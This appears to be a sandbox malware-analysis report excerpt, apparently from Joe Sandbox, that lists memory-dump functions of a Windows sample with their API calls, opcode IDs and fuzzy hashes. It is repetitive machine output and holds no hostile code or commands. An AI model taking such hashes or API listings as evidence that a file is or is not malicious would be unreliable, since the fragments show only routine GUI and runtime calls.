                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Window$EmptyException@8H_prolog3StateThrow
                                                                  • String ID:
                                                                  • API String ID: 3036809859-0
                                                                  • Opcode ID: b2a1368cd446b3b16feddcb37dc0484d0657527a798bbd9f336729e2cc51f8db
                                                                  • Instruction ID: 0e6eba0308faacfcca9c0f907f03836a3a2a8f3c86cffdd562b4d13e659374e8
                                                                  • Opcode Fuzzy Hash: b2a1368cd446b3b16feddcb37dc0484d0657527a798bbd9f336729e2cc51f8db
                                                                  • Instruction Fuzzy Hash: 4FA12B71A1120AAFCB15DFA5C8849EEFBF9FFA8300F240469E945EB254DB319C91CB51
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 001FAB78
                                                                  • CopyRect.USER32(?,?), ref: 001FAB83
                                                                  • GetClientRect.USER32(?,?), ref: 001FAB9C
                                                                  • SystemParametersInfoW.USER32(00000026,00000000,?,00000000), ref: 001FAD32
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$ClientCopyInfoParametersSystemWindow
                                                                  • String ID:
                                                                  • API String ID: 1264264222-0
                                                                  • Opcode ID: a3c0cd91e27d7d8c483dab4df563e03c3d05568543069c66ed690938eac4e2cd
                                                                  • Instruction ID: 2ac38f144945b98dce45084fe31101636cb19a4a3879dbd01bca5b990ca5cf89
                                                                  • Opcode Fuzzy Hash: a3c0cd91e27d7d8c483dab4df563e03c3d05568543069c66ed690938eac4e2cd
                                                                  • Instruction Fuzzy Hash: 0281F8B1D00619DFCB14DFA8C9889BEBBB5FF48700F518169E91AAB204DB34A945CB91
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 0020C2D8
                                                                  • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 0020C31E
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000185), ref: 0020C32E
                                                                  • IsWindowVisible.USER32(?), ref: 0020C3D3
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$RedrawVisible
                                                                  • String ID:
                                                                  • API String ID: 2376333906-0
                                                                  • Opcode ID: a3ede0a585cb0ed0f652539bb1fb0954ac1b6273cfba5f59dc632bfa49ec1283
                                                                  • Instruction ID: c485df6ebfd4282485b3be70e6a444b60b3d59693e9fa0160917bda81714df4d
                                                                  • Opcode Fuzzy Hash: a3ede0a585cb0ed0f652539bb1fb0954ac1b6273cfba5f59dc632bfa49ec1283
                                                                  • Instruction Fuzzy Hash: 4A51A570220701AFC7219F64C889E6AB7B6FF85700B3446ADF54A8B6A2DB31EC51CB50
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$CopyEmptyWindow
                                                                  • String ID:
                                                                  • API String ID: 2176940440-0
                                                                  • Opcode ID: b50d462ff7981a7254f4c11dc5263c70112f5a9bad2d763830fedf8a82aad4a1
                                                                  • Instruction ID: 988eb38c2d4eb5fbc4233cbdbff36d6dc92e1dcc772dbe8ee8d1d429990773f8
                                                                  • Opcode Fuzzy Hash: b50d462ff7981a7254f4c11dc5263c70112f5a9bad2d763830fedf8a82aad4a1
                                                                  • Instruction Fuzzy Hash: 315108B1D11629AFCB11DFA9D9948EEFBF9EF48700F10815AE409A7210D7B06E41CFA1
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: File$SizeTime_memset
                                                                  • String ID:
                                                                  • API String ID: 151880914-0
                                                                  • Opcode ID: 2f8f45f03059d9d012a53556888bb30d86ff92d9a73f6460150814e5fd8645d2
                                                                  • Instruction ID: 95f2d3f6d93211ee6add554a0b020eb4b456604787b28863b1a64ffda9e99700
                                                                  • Opcode Fuzzy Hash: 2f8f45f03059d9d012a53556888bb30d86ff92d9a73f6460150814e5fd8645d2
                                                                  • Instruction Fuzzy Hash: DC515CB1910709AFC724EFA4D981DAAB7F8FF183107148A2EE567D7691E730E914CB50
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen
                                                                  • String ID:
                                                                  • API String ID: 176396367-0
                                                                  • Opcode ID: 191e8704ea0488ce00999f967bb9842e730ee8a537e8f92bc74045aaa9c31603
                                                                  • Instruction ID: 525f8dd5ad0bf0b6d3ea9f451bb8f448cbcfa756f6e03dda03b37580e0d0f2c4
                                                                  • Opcode Fuzzy Hash: 191e8704ea0488ce00999f967bb9842e730ee8a537e8f92bc74045aaa9c31603
                                                                  • Instruction Fuzzy Hash: 34518C76D04219EFCF15DFA8D880AEEB7B4EF58354B21446AE805B7201DB30EE41CB90
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 001DC599
                                                                  • SendDlgItemMessageA.USER32(?,?,?,00000000,?), ref: 001DC6E5
                                                                    • Part of subcall function 001C8E6A: _malloc.LIBCMT ref: 001C8E88
                                                                  • SendDlgItemMessageW.USER32(?,?,0000040B,00000000,00000001), ref: 001DC671
                                                                    • Part of subcall function 00205BA3: __EH_prolog3.LIBCMT ref: 00205BAA
                                                                  • SendDlgItemMessageW.USER32(?,?,0000037C,?,?), ref: 001DC6A3
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMessageSend$H_prolog3$_malloc
                                                                  • String ID:
                                                                  • API String ID: 2480034192-0
                                                                  • Opcode ID: d019a74fdf770443f219c6de43685247275236c31c9dccb200bac61a9e5e06ab
                                                                  • Instruction ID: 7d6ba2c274df8b4c4be0324fc1c11dbee1a28ace7464abbfacf86daf5782aca9
                                                                  • Opcode Fuzzy Hash: d019a74fdf770443f219c6de43685247275236c31c9dccb200bac61a9e5e06ab
                                                                  • Instruction Fuzzy Hash: 6141C0B1900106ABDF259F64DC44ABE76B5FF50320F504A1AF965AA3D1DB308E41DB90
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                  • String ID:
                                                                  • API String ID: 2782032738-0
                                                                  • Opcode ID: 9fb5eafde9ac0169d79dbd6bd5820b39befd159722b1eca9078c5386278874eb
                                                                  • Instruction ID: 3df196c1d2c5d68a94ab546a6dbff5bc28a778d47a99676bb664484b759ea65b
                                                                  • Opcode Fuzzy Hash: 9fb5eafde9ac0169d79dbd6bd5820b39befd159722b1eca9078c5386278874eb
                                                                  • Instruction Fuzzy Hash: 5E41C831A207059BDF249FA59884ADFBBB9AF90390F28862DD41997150FB70ED60DF40
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 002147BE
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                    • Part of subcall function 001CBB21: __EH_prolog3_catch.LIBCMT ref: 001CBB28
                                                                  • GetWindowRect.USER32(?,?), ref: 002148B2
                                                                  • GetSystemMetrics.USER32(00000010), ref: 002148C0
                                                                  • GetSystemMetrics.USER32(00000011), ref: 002148CB
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$Exception@8H_prolog3H_prolog3_H_prolog3_catchRectThrowWindow
                                                                  • String ID:
                                                                  • API String ID: 3575448974-0
                                                                  • Opcode ID: da32130dc241b86dba400f47bcf5b8bcdf385f8cb5fa4bb95351ed2a44a43ce1
                                                                  • Instruction ID: b5fc87f2dd130993bce9e9cfe67975c05ff17dad68c499fe84f50bdb7fa9f09d
                                                                  • Opcode Fuzzy Hash: da32130dc241b86dba400f47bcf5b8bcdf385f8cb5fa4bb95351ed2a44a43ce1
                                                                  • Instruction Fuzzy Hash: D8415871A006199FCB04EFA4C895AEEBBF5FF58300F154469F94AAB291CB70A941CF50
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: EmptyRect
                                                                  • String ID:
                                                                  • API String ID: 2270935405-0
                                                                  • Opcode ID: 9399b382d9962ed81cc65db2dde788c9448939df611c29381161018ebd02d223
                                                                  • Instruction ID: 8cab308916ce181e283c9b4be732f2434437d8003f5cb70829a86321f318a59f
                                                                  • Opcode Fuzzy Hash: 9399b382d9962ed81cc65db2dde788c9448939df611c29381161018ebd02d223
                                                                  • Instruction Fuzzy Hash: 99519EB1815B858EC360DF3AC5816E7FAE9BFA4314F104A2FD0EED2261DBB065818F51
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ClientScreenWindow
                                                                  • String ID:
                                                                  • API String ID: 1643562046-0
                                                                  • Opcode ID: f80358801e2eef1af9e9e07792a58beaa27945b17854569246b367804348e552
                                                                  • Instruction ID: bf6050bc866e7f723c8aaea7c64ba2c5b5abed5a23556e2749458fa76a917962
                                                                  • Opcode Fuzzy Hash: f80358801e2eef1af9e9e07792a58beaa27945b17854569246b367804348e552
                                                                  • Instruction Fuzzy Hash: D141CC71500A40AADF249F56CCA0ABE7BF9EF1C300F24492AE98AD2161EB31DD90DB10
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ClientScreenWindow
                                                                  • String ID:
                                                                  • API String ID: 1643562046-0
                                                                  • Opcode ID: e67157617c764d6422848c730245c940a928572c096b9933ca93657811f385c4
                                                                  • Instruction ID: ca0c1cf51329030c48601760663f2bcc2c713cca9ae66f0d91d0a013fa52ec13
                                                                  • Opcode Fuzzy Hash: e67157617c764d6422848c730245c940a928572c096b9933ca93657811f385c4
                                                                  • Instruction Fuzzy Hash: 8F41BC71540A84FAEB249F96CD84EBE77F9EF18340F304429EA8AC6160EB31DD91CB50
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 002D0870
                                                                  • __isleadbyte_l.LIBCMT ref: 002D08A3
                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,?,?,00000000,?,?,?), ref: 002D08D4
                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000,?,?,?), ref: 002D0942
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                  • String ID:
                                                                  • API String ID: 3058430110-0
                                                                  • Opcode ID: 05b8ccbd1018b47817dbe67d6d155d643a4d7adf38a1b64e0d96ff5706034cbb
                                                                  • Instruction ID: 7f4ae0e0af0ef882a2f01d75bc65a6e38cb028c38577a70d597d31d5532abf82
                                                                  • Opcode Fuzzy Hash: 05b8ccbd1018b47817dbe67d6d155d643a4d7adf38a1b64e0d96ff5706034cbb
                                                                  • Instruction Fuzzy Hash: C131BF31A20286EFDB10DFA4C8D4BAE3BA5AF01310F1585AAE451CB2A1D730DD60EB90
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 002087AD
                                                                  • GetDlgCtrlID.USER32(?), ref: 00208816
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                  • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,00000050,00000000,00000000,00000000,0000020C,0020B1BA,?,?,?), ref: 00208877
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 002088AC
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharCtrlException@8H_prolog3H_prolog3_MultiThrowWideWindow
                                                                  • String ID:
                                                                  • API String ID: 1933732581-0
                                                                  • Opcode ID: a72aa23bd56f16ccf6d9675448efcf7ff8b75d7e0fc4462d74f5c0d2153583ba
                                                                  • Instruction ID: 21f72f16ff852b6e92ed7e4ac31f1973e675dc258502f6982df6e26c24f93ac2
                                                                  • Opcode Fuzzy Hash: a72aa23bd56f16ccf6d9675448efcf7ff8b75d7e0fc4462d74f5c0d2153583ba
                                                                  • Instruction Fuzzy Hash: 9131043059030957CF21AB708C89FEF7368AF70710F50465CF6A6A61D2DF309D908A21
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$ClientEmptyWindow
                                                                  • String ID:
                                                                  • API String ID: 742297903-0
                                                                  • Opcode ID: 804e7314d271d84f1c2618944b4be68566560f9c5a74aad7518e0ac03cd91040
                                                                  • Instruction ID: fa4c836a4a9e005803ef6d2cf6d3ad2e5033bf2ee820c95b618ae6ca40cb7b56
                                                                  • Opcode Fuzzy Hash: 804e7314d271d84f1c2618944b4be68566560f9c5a74aad7518e0ac03cd91040
                                                                  • Instruction Fuzzy Hash: C8311AB161010AEFCB05DF68D984AA9B7F9FF59304B508569E41ADB251DB30ED50CF90
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: EmptyRect
                                                                  • String ID:
                                                                  • API String ID: 2270935405-0
                                                                  • Opcode ID: 06eb99db7b490d945d042bf01b55bc9900f0e2220910c77f35b9a17428c67433
                                                                  • Instruction ID: 38577e348ffa4fef31b3909df0c92d63c513909fa28d6701f1b6b953d57bfbf8
                                                                  • Opcode Fuzzy Hash: 06eb99db7b490d945d042bf01b55bc9900f0e2220910c77f35b9a17428c67433
                                                                  • Instruction Fuzzy Hash: A331AF71910629DBCF11DFA9C8C099EF7FCEF48710B60846AE909AB106D7B19D51CF91
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
